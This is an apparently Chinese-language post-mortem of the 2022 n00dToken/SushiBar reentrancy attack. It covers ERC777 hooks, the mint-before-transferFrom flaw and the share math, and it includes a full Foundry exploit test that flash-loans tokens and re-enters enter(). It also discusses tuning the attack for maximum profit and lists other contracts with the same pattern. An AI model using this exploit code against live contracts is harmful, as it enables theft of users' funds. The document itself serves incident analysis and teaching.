ERC777 是 ERC20 标准的高级代币标准,要提供了一些新的功能:运营商及钩子。
举个简单的栗子解释这两个功能(更多详细内容可阅读参考部分提供的链接)。
运营商功能:某区块链公司的老板使用某种基于 ERC777 的 A 代币作为工资发放,公司账户一共有 500 万的 A 代币,而经过人事的计算,本月共应发总工资为 200 万代币 A,那么公司老板就可以将财务的以太坊钱包地址作为运营商,并授权 200 万 A 代币的使用权限,那么财务便有权限使用公司地址 500 万中的 200 万 A 代币,并且对于公司来说,其余的金额是安全的。
钩子功能:可用来限制运营商的一些权限。如公司老板可以通过钩子规定运营商对公司账户中授权的 200 万 A 代币的走向做一个限制,规定只能转向某些已经标名备注了的地址,例如公司全体员工地址,以及限定单笔可发送的最大值等等。
攻击发生时间 2022-10-26 12:46:59
区块高度:15826380
攻击者: 0x8Ca72F46056D85DB271Dd305F6944f32A9870FF0
受害合约: 0x9C5A2A6431523fBBC648fb83137A20A2C1789C56
pair 合约: 0x5476DB8B72337d44A6724277083b1a927c82a389 为 n00dToken 与 WETH 的 pair 合约,为 uniswapV2 的 pair 合约。
SushiBar ERC20 合约地址:0x3561081260186E69369E6C32F280836554292E08
n00dToken ERC777 合约地址: 0x2321537fd8EF4644BacDCEec54E5F35bf44311fA
这两个合约是什么关系?SushiBar 合约中有个 sushi 的合约变量,指向的是 n00dToken,
contract n00dToken is ERC777 {
constructor(uint256 initialSupply, address[] memory defaultOperators)
ERC777("n00dle", "n00d", defaultOperators)
{
_mint(msg.sender, initialSupply, "", "");
}
}
攻击最终获利多少呢?
通过上图,从资产转移来看,最终的攻击效果是,黑客攻击了 SushiBar 合约,从 SushiBar 合约中提取了 42,752 价值的 n00dToken,用 42,752 的 n00dToken 在 Uniswap 中换了价值 29,388 的 WETH,最后将 29,388 的 WETH 换成了 ETH.
功能:将 n00dToken 兑换成 bar 币。
输入:要兑换的 n00dToken 的数量。
输出:兑换出 bar 币到 msg.sender 中。
函数执行过程中
mint 出凭证,得到发送者的 noodToken。(注意这里的顺序,是先 mint,后得到 noodToken,这也是漏洞出现的原因)
调用 enter 后,sushiBar 合约会 mint 出一定数量的凭证,然后从 noodToken 中转移_amount 数量的 noodToken 到 sushiBar 合约中。
// Enter the bar. Pay some SUSHIs. Earn some shares.
function enter(uint256 _amount) public {
uint256 totalSushi = sushi.balanceOf(address(this));
uint256 totalShares = totalSupply();
if (totalShares == 0 || totalSushi == 0) {
_mint(msg.sender, _amount);
} else {
uint256 what = _amount.mul(totalShares).div(totalSushi);
_mint(msg.sender, what);
}
sushi.transferFrom(msg.sender, address(this), _amount);
}
// enter 的计算方式: uint barSwapCount = enterAmount.mul(bar.totalSupply()).div(n00d.balanceOf(BARADDR));
假设输入的 n00dToken 币数量为 n,可兑换出的 bar 的数量为 b,bar 合约的 totalSupply 为 T,bar 合约的 n00dToken 余额(n00d.balanceOf(BARADDR))为 B。则有
b=n*T/B (1)
enter 完成后,T 的值和 B 的值都会发生变化,各自的变量函数如下:
T‘ = T + b (2)
B’ = B + n (3)
功能:将 bar 币兑换成 n00dToken。
输入: 要兑换的 bar 币的数量
输出:兑换出 n00dToken 到 msg.sender
function leave(uint256 _share) public {
uint256 totalShares = totalSupply();
uint256 what = _share.mul(sushi.balanceOf(address(this))).div(totalShares);
_burn(msg.sender, _share);
sushi.transfer(msg.sender, what);
}
}
// uint n00dSwapCount = (bar.balanceOf(address(this)).mul(n00d.balanceOf(BARADDR))).div(bar.totalSupply());
假设输入的 bar 币数量为 b’,可兑换出的 n00dToken 的数量为 n’,bar 合约的 totalSupply 为 T’,bar 合约的 n00dToken 余额(n00d.balanceOf(BARADDR))为 B’。则有
n’=b’*B’/T’ (4)
假设这样一个场景:用户在 enter 中使用 n 个 n00dToken,mint 出 b 个 bar 币。如果这个用户在 leave 中 burn 掉这 b 个 bar 币,可以得到多少个 n00dToken?
根据 4,得到的 n’=b’*B’/T’
因为 b’就是 mint 出来的,所以 b’=b
所以 n’=b’*B’/T’ = bB’/T’ 将(2)代入 = bB’/(T+b) 将(1)换成 T=bB/n 代入 = bB’/(bB/n + b)= n
所以使用 n 个 n00dToken mint 的 b 个 bar 币,直接 leave 掉的话,还会得到 n 个 n00dToken.
漏洞关键点:
漏洞出现在上面的 shiBar 合约的 enter 函数中,shiBar 合约中,主要是因为先执行了 mint,后执行了 transferFrom。
// Enter the bar. Pay some SUSHIs. Earn some shares.
function enter(uint256 _amount) public {
uint256 totalSushi = sushi.balanceOf(address(this));
uint256 totalShares = totalSupply();
if (totalShares == 0 || totalSushi == 0) {
_mint(msg.sender, _amount);
} else {
uint256 what = _amount.mul(totalShares).div(totalSushi);
_mint(msg.sender, what);
}
sushi.transferFrom(msg.sender, address(this), _amount);
}
n00dToken 使用了 ERC777 的规范,所以可以对 n00dToken 设置钩子函数,从而可以劫持 1 中的 transfrom,在钩子函数中再次调用 enter 实现重入。
研究发现,先 mint 后 transFrom 的合约还是有很多的。比如下面的:
0x8798249c……1865ff4272
0xf7a038375……ff98e3790202b3
0x9257fb8fa……47403617b1938
0x36b679bd……dcb892cb66bd4cbb
典型的重入漏洞,分析重入漏洞两板斧:
找循环的调用关系
bar.enter()→bar.mint()→hack.tokensToSend→bar.enter→bar.mint()→hack.tokensToSend→……
→n00dToken.transferFrom
标颜色的两个部分实现了循环调用,在循环调用完成后(这时已经调用了多次的 mint)才会调用 n00dToken.transferFrom 进行转账。
找代币变化
“吃了两碗的粉,只给了一碗的钱”。正常情况下,调用完一次 mint,就会转账,然后更新各类的 balance。但在重入的情况下,调用了第 1 次的 mint,没进行转账和 balance 更新,又调用第 2 次 mint,也没进行转账和 balance 更新,直到 n 次重入完成后,才进行第 1 次 mint 时的转账和 balance 更新,相同于第 2,3……,n 次时还是用第 1 次 mint 时的价格结的账。
bar.enter()中先 mint 后 transfer,transfer 会调用到黑客的 tokensToSend,黑客在 tokensToSend 函数中再次调用 bar.enter()
正常情况与重入状态下的代币的变化
总结: 1.正常情况下,同等数量的 n00dToken 会 mint 出相同数量的 bar。 2.正常情况下和重入攻击情况下,最终的 n00d.balanceOf(bar)会相同,但 bar.supply 重入攻击情况下比正常情况下大。 因为重入中,最终的 transferFrom 都会执行,所以 n00d.balanceOf(bar)会相同。 而由于差价的改变,重入时多 mint 了 bar,所以 bar.supply 重入攻击情况下比正常情况下大。 3. 重入攻击的作用就是在拖延了 transferFrom 的执行,因为 transferFrom 会引起价格变化,拖延 transferFrom 的执行就相同于延缓了价格变化,用低价 mint 了后面几次。
我们可以比较在当时的区块上,正常转账与重入攻击状态下转账的情况。
不论是一性转入还是分三次转。最终 mint 出来的 bar 的数量是一致的,都为 14900396190115982310618。
而在重入情况下。mint 出来的 bar 数量为 34100275953928728876790>14900396190115982310618。
在攻击中,一共输入 5036824491352933286390 进行了 3 次的 entry。共 mint 出 26153547068271320288007。
攻击中共调用了三次 entry,每次 mint 出来的数量如下:
before Enter]bar.supply: 7946728885657408588790 , n00d.ban: 8058768001881461618923
三次共 mint:26153547068271320288007
第一次 mint: 4966798730038660770207
第二次 mint: 8071106172719568973063
第三次 mint: 13115642165513090544737
bar.supply: 34100275953928728876790, n00d.ban: 23169241475940261478093
调用过程,hackEOA 调用了 hackCon 的 fc7e3db8 函数。
参考代码(可联系获取):
anvil --fork-url https://rpc.ankr.com/eth --fork-block-number 15826379
代码中有 3 要要注意的变量,这三个变量根据重入漏洞和池子 reserve 的不同,追求利益最大化时要动态调整。
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;
import "forge-std/Test.sol";
import "../src/interface.sol";
import "../src/SushiBar.sol";
import "forge-std/console2.sol";
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
contract ContractTest is Test{
using SafeMath for uint256;
address constant N00DADDR = 0x2321537fd8EF4644BacDCEec54E5F35bf44311fA;
address constant BARADDR = 0x3561081260186E69369E6C32F280836554292E08;
IERC777 n00d = IERC777(N00DADDR);
sushiBar bar = sushiBar(BARADDR);
Uni_Pair_V2 pair = Uni_Pair_V2(0x5476DB8B72337d44A6724277083b1a927c82a389);
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
ERC1820Registry registry = ERC1820Registry(0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
uint enterAmount = 0;
uint ATTACK_COUNT = 4; // 记录共进行了几次攻击
uint RECOUNT_PER_ATTACK = 2; // 记录每次攻击中执行几次重入操作
uint curCountPerAttack = 0;
uint n00dReserve;
uint wethReserve;
function setUp() public {
// cheats.createSelectFork("mainnet", 15826379);
}
function testExploit() public{
registry.setInterfaceImplementer(address(this), bytes32(0x29ddb589b1fb5fc7cf394961c1adf5f8c6454761adf795e67fe149f658abe895), address(this));
for (uint256 curAttCount = 0; curAttCount < ATTACK_COUNT; curAttCount++) { // 共执行4次攻击
console2.log("\n[Attack times: %d]", curAttCount);
curCountPerAttack = 0; // 每轮攻击之前,将重入的次数归0
(n00dReserve, wethReserve, ) = pair.getReserves();
console2.log("\nPair n00dReserve: %d, wethReserve: %d", n00dReserve, wethReserve);
n00d.approve(BARADDR, ~uint(0));
bytes memory data = "0x333";
pair.swap(n00dReserve - 1, 0, address(this), data); //进行闪电贷,会来到自定义的uniswapV2Call函数执行
uint amountIn = n00d.balanceOf(address(this));
(uint n00dR, uint WETHR, ) = pair.getReserves();
uint amountOut = amountIn * 997 * WETHR / (amountIn * 997 + n00dR * 1000);
n00d.transfer(address(pair), amountIn);
pair.swap(0, amountOut, address(this), "");
emit log_named_decimal_uint(
"Attacker WETH profit after exploit",
WETH.balanceOf(address(this)),
18
);
}
}
function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public{
enterAmount = (n00d.balanceOf(address(this))-1) / 4; // 攻击过程中使用的是4,因为共执行了3次enter,需要用到3份资金,这里就比3多分了一份。
// enter的计算方式: uint barSwapCount = enterAmount.mul(bar.totalSupply()).div(n00d.balanceOf(BARADDR));
bar.enter(enterAmount);
// leave的计算方式: _share.mul(sushi.balanceOf(address(this))).div(totalShares);
// uint n00dSwapCount = (bar.balanceOf(address(this)).mul(n00d.balanceOf(BARADDR))).div(bar.totalSupply());
bar.leave(bar.balanceOf(address(this)));
uint flashReAmount = n00dReserve * 1000 / 997 + 1;
n00d.transfer(address(pair), flashReAmount); //归还闪电贷本息
}
function tokensToSend(
address operator,
address from,
address to,
uint256 amount,
bytes calldata userData,
bytes calldata operatorData
) external {
if(to == address(bar) && curCountPerAttack < RECOUNT_PER_ATTACK){ // 攻击者执行了2次
curCountPerAttack++;
bar.enter(enterAmount);
}
}
function tokensReceived(
address operator,
address from,
address to,
uint256 amount,
bytes calldata userData,
bytes calldata operatorData
) external {}
}
那么思考一个问题:是不是共攻击 4 次,每次执行 2 次重入就能利益最大化呢?
不是的。
可以试验,如果共攻击 3 次,每次执行 3 次重入时,能获得的收益(21ETH)比实际攻击过程的收益(20.82ETH)更大一点,但整个池子基本也就是这么大的一个盈利了,不能高出太多了。
那么有没有办法能把提取出的币更高一些呢?这就涉及到 uniswapV2 合约的计算了。
uniswap 的池子中最多可以取出多少?
根据 routerV2 合约中的 getAmountOut 的计算函数的代码。
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) internal pure returns (uint amountOut) {
require(amountIn > 0, 'UniswapV2Library: INSUFFICIENT_INPUT_AMOUNT');
require(reserveIn > 0 && reserveOut > 0, 'UniswapV2Library: INSUFFICIENT_LIQUIDITY');
uint amountInWithFee = amountIn.mul(997);
uint numerator = amountInWithFee.mul(reserveOut);
uint denominator = reserveIn.mul(1000).add(amountInWithFee);
amountOut = numerator / denominator;
}
假设是用 A 兑换 B,getAmountOut 是用来计算使用 amountIn 个 A 最终能兑换出的 B 的数量。
函数的输入输入:
amountIn: 用来兑换的 A 的数量,假设为 x。
reserveIn:A 的 reserve 储备量,假设为 X。
reserveOut:B 的 reserve 储备量,假设为 Y。
计算公式为:
根据这个公式,永远不可能把 Y 全部取出来,但会越来越接近 Y 的储备量。如果分多次取的话,后面取时,Y 的数量会起来越少,Y 的价格就会越来越高,同样 X 取出的 Y 就会越来越少,所以越到最后,取出 Y 所需要的 X 起来越多。
所以,回到这个问题的答案,那么有没有办法能把提取出的币更高一些呢?有的,攻击时只是从 0x5476DB8B72337d44A6724277083b1a927c82a389 的 pair 合约中借出 n00d 来进行攻击,如果可以从更多的地方想办法借更多的 n00d 代币,可能会使取出的币数量列多。
下面的代码中也有类似的问题,但因为对应的 n00d 合约使用的是 ERC20,并非 REC777,因此即使有重入的风险,但没法利用。
0x36b679bd64ed73dbfd88909cdcb892cb66bd4cbb Standard
0x8798249c2e607446efb7ad49ec89dd1865ff4272 SushiBar